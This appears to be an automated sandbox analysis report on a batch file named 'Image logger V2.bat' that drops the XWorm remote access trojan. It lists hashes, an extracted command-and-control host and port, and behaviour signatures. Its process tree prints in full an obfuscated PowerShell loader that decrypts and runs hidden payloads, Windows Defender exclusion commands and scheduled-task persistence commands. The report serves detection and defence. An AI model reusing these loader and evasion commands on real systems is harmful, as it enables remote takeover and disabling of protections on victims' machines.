Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/09/2024, 08:24

General

  • Target

    Image logger V2.bat

  • Size

    29.9MB

  • MD5

    f9fe001633e62b59eec398eaeb5d9b3c

  • SHA1

    edc9879fab5c9e69eca9814584a3079e93a4339d

  • SHA256

    2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

  • SHA512

    0bebd885894e67d2490c55f9d07f7bdaf2e1c5aea1632739fb41b7a05fb6e2a997948dd22f6d1e5b4b1233a40d76ae326acd8d0ad1d54b0ae7c0d55be4da8a20

  • SSDEEP

    49152:4JDhbOqBRZaVCQdy5U5CTCxA2HRHt21676CpcIZPxlwmCQ2VjDnMl/6xXh7r9EGV:47

Malware Config

Extracted

Family

xworm

C2

since-searching.gl.at.ply.gg:64197

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Helper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 32 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_430_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_430.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2120
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_430.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_430.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:4904
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_430.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_430.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3768
                • C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
                  "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2412
                  • C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
                    "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3888
                • C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe
                  "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • Suspicious use of WriteProcessMemory
                  PID:4112
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2724
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4464
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WebhookSpammerV5.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4372
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "WebhookSpammerV5" /tr "C:\ProgramData\WebhookSpammerV5.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1132
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAagBzACMAPgA="
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQByACMAPgA="
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4804
                  • C:\Windows\Latite_Client_betterV1.exe
                    "C:\Windows\Latite_Client_betterV1.exe"
                    7⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:4532
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3972
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1520
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite_Client_betterV1.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1428
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite_Client_betterV1" /tr "C:\ProgramData\Latite_Client_betterV1.exe"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:3484
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        9⤵
                          PID:1656
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdABzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByACAAbgBvAHQAIAB3AG8AcgBrAGkAbgBnACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB6AHkAdAAjAD4A"
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4992
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAeQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBmACMAPgA="
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2280
                      • C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe
                        "C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe"
                        8⤵
                        • Checks computer location settings
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SetWindowsHookEx
                        PID:1296
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4776
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            10⤵
                              PID:5076
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3064
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3204
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite Client_BetterV3" /tr "C:\ProgramData\Latite Client_BetterV3.exe"
                            9⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:3252
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2912
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4796
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:3692
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4912
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
                            9⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:4120
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.21 64197 7777 4BC88332F36C4890A41E
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:664
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
                              10⤵
                              • System Location Discovery: System Language Discovery
                              PID:4244
                              • C:\Windows\SysWOW64\explorer.exe
                                "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
                                11⤵
                                • System Location Discovery: System Language Discovery
                                PID:3976
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
                              10⤵
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:1672
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
                                11⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                PID:4860
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2
                                11⤵
                                  PID:3540
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2292 /prefetch:3
                                  11⤵
                                    PID:2260
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2596 /prefetch:8
                                    11⤵
                                      PID:3052
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
                                      11⤵
                                        PID:716
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                        11⤵
                                          PID:1972
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
                                          11⤵
                                            PID:4748
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                                            11⤵
                                              PID:376
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
                                              11⤵
                                                PID:2088
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
                                                11⤵
                                                  PID:2808
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
                                                  11⤵
                                                    PID:4904
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                                                    11⤵
                                                      PID:3108
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
                                                      11⤵
                                                        PID:4028
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
